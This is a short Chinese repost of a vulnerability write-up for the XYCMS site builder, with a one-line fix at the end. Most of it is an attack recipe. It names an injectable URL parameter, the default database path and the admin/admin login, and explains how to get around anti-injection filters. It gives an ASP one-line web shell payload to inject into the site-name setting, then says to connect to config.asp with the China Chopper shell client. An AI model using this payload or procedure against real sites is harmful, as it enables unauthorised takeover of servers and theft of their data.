showkbxx.asp?id= 有注入点 默认数据库:data/xy#!123.mdb 默认账户和密码:admin admin 有很多网站都是有防注入的,这个时候我们可以 下载 数据库 ,然后本地搭建,替换原来的数据库,进行注入得到管理员账户和密码 后台拿shell 有个网站配置,在网站名称里面直接添加:xxx网站"%><%eval request("stomach")%><%' 在里面直接插入,不要删掉网站名称。。。 然后菜刀连接http://www.2cto.com /inc/config. asp 密码你们懂的 修复方案 过滤,修改默认数据库名
查看更多关于XYCMS企业建站系统默认数据库、后台拿WebShell -的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11887